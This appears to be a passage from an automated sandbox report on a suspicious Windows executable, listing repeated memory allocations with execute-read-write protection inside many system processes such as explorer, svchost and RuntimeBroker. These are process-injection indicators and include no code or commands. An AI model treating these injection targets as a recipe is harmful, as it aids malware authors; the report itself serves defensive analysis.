        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 1D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 6A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 430000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 910000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 830000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: B230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 320000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 660000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 8D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 1E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 6B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 440000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 920000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 840000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: B780000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 330000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 8E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 1F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 6C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 450000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 930000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 850000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: B790000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 340000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 680000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 8F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: FD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 200000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 200000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 6D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: D90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 460000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 940000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 860000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: B7A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 350000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 690000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 1D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 900000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: FE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: A10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: B10000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 600000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\conhost.exe base: 5E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\backgroundTaskHost.exe base: C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dllhost.exe base: D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: FC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\dwm.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\sihost.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 470000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 950000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 870000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\explorer.exe base: B7B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\svchost.exe base: 360000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 6A0000 protect: page execute and read and writeJump to behavior
